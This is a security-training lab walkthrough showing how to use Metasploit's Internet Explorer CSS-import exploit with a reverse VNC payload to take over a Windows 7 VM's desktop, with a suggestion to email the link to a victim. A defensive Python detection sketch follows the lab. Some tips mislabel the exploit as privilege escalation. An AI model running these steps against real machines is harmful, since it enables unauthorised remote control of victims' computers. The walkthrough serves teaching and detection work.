WWW.Prohackers.in
Lab-3
“Exploiting Client-Side Vulnerabilities and Establishing a VNC Session”
By: Vishal Kumar (CEH, CHFI, CISE, MCP)
Table of contents
1. Lab Scenario
2. Lab Objective
3. Lab Tasks
3.1 Task 01:- Launch Metasploit Console
3.2 Task 02:- Using Browser Exploit for Windows
3.3 Task 03:- Setting Payload
3.4 Task 04:- Setting LHOST and LPORT
3.5 Task 05:- Running Exploit
3.6 Task 06:- Remote View in Kali Linux
Task 01:- Launch Metasploit console.
● Start Kali Linux, open a command terminal, type the command msfconsole and press
Enter to launch the Metasploit console.
Tip: - msfconsole can also be run from Application → Kali Linux → Top 10 Security tools →
metasploit framework.
Tip: - In the Metasploit framework, all modules are Ruby classes.
● The Metasploit console is launched on the Kali Linux machine, as shown in the
screenshot below.
Now search the Metasploit database for privilege escalation exploits: type search ms11
and press Enter. This command displays the available exploits in the Metasploit
database.
Tip: - msfconsole includes extensive regular-expression based search functionality. If you have a
general idea of what you are looking for, you can search for it via “search”.
Task 02:- Using Browser Exploit for Windows.
● Type use exploit/windows/browser/ms11_003_ie_css_import and press Enter.
Tip: - This module exploits memory corruption vulnerabilities within Microsoft's HTML engine
(mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted
and later reused.
Task 03:- Setting Payload.
● Type set payload windows/vncinject/reverse_tcp and press Enter.
● To check the options available in this exploit, type show options and press Enter.
● In the following screenshot, we can see that LHOST is not set and LPORT is on its
default port number. Now, we need to set LHOST and LPORT.
Tip: - If you have selected a specific module, you can issue the ‘show options’ command to display
which settings are available and/or required for that module.
Task 04:- Setting LHOST and LPORT.
● Type set LHOST [attacker machine IP address, i.e. the Kali Linux IP address] and
press Enter.
● To set the local port, type set LPORT 443 and press Enter.
Now, verify the options that have been set: type show options and press Enter. The
Local Host (LHOST) and Local Port (LPORT) are now set.
Tip: - The ‘set’ command allows you to configure Framework options and parameters for the current
module you are working with.
Task 05:- Running Exploit.
● Type exploit and press Enter to run the exploit. This command provides you with
a Local IP URL, which can be sent to the victim’s machine through email or any
other source of communication.
● Now, switch to the Windows 7 (virtual machine) and open Internet Explorer;
then copy the Local IP URL, that is: http://192.168.1.102:8080/FkEF1aT, and
paste it in the address bar and press Enter.
● Once you have pressed Enter, Internet Explorer displays a blank screen.
Tip: - Windows client-side attack using a browser vulnerability and privilege escalation via task
scheduler exploit.
Task 06:- Remote view in Kali Linux.
● Switch to Kali Linux (attacker machine). You can see that a Remote Desktop window
for the victim machine has opened automatically in the TightVNC window, as shown in the
following figure.
● Minimize the TightVNC remote window, and observe in msfconsole that, without any
authentication, we have successfully gained access to the victim machine.
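A defender-side view of Tasks 05 and 06, as an added example that is not part of the original lab: the sequence the lab produces on the network is an Internet Explorer fetch of a one-segment URL on a bare IP and non-standard port, followed by a connection from the same client back to that IP on LPORT 443. The event tuple format, the 60-second window, the path heuristic, and the client addresses and timestamps are assumptions made for this sketch; only the URL and port 443 come from the lab.

```python
import ipaddress
import re
from urllib.parse import urlsplit

IE8 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
# Constructed events (assumed format): (epoch_seconds, client_ip, kind, detail).
# "http" detail = (url, user_agent); "tcp" detail = (dst_ip, dst_port).
# Only the URL and port 443 come from the lab; clients and times are invented.
SAMPLE_EVENTS = [
    (1000, "192.168.1.50", "http", ("http://intranet.example/index.html", IE8)),
    (1010, "192.168.1.50", "http", ("http://192.168.1.102:8080/FkEF1aT", IE8)),
    (1012, "192.168.1.50", "tcp", ("192.168.1.102", 443)),
    (1020, "192.168.1.51", "http", ("http://192.168.1.20:8080/admin/index.html", IE8)),
    (1025, "192.168.1.51", "tcp", ("192.168.1.102", 443)),
]

ONE_SEGMENT = re.compile(r"^/[A-Za-z0-9]{4,16}$")  # heuristic: one short opaque path segment
IE_UA = re.compile(r"MSIE |Trident/")


def is_suspicious_fetch(url, user_agent):
    """Internet Explorer fetching a one-segment path from a bare IP on an odd port."""
    parts = urlsplit(url)
    try:
        ipaddress.ip_address(parts.hostname or "")
    except ValueError:
        return False  # host is a name, not an IP literal
    port = parts.port or 80
    return (port not in (80, 443)
            and ONE_SEGMENT.match(parts.path) is not None
            and IE_UA.search(user_agent) is not None)


def correlate(events, window=60):
    """Return (client, server_ip, port) for each suspicious fetch that is followed
    within `window` seconds by a TCP connection to the same IP on another port."""
    fetches, alerts = {}, []
    for ts, client, kind, detail in sorted(events, key=lambda e: e[0]):
        if kind == "http" and is_suspicious_fetch(*detail):
            parts = urlsplit(detail[0])
            fetches[(client, parts.hostname)] = (ts, parts.port or 80)
        elif kind == "tcp":
            dst_ip, dst_port = detail
            seen = fetches.get((client, dst_ip))
            if seen and ts - seen[0] <= window and dst_port != seen[1]:
                alerts.append((client, dst_ip, dst_port))
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print("ALERT client=%s server=%s callback_port=%d" % alert)
```

Neither signal is conclusive on its own; the pairing of the fetch and the follow-up connection is what makes the alert worth triaging.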
Tool/Utility: Metasploit Framework Console (msfconsole)
Information Collected/Objectives Achieved:
IP Address Range/target:- Windows 7 machine
Scan Result:-
● Remote Desktop without any Authentication.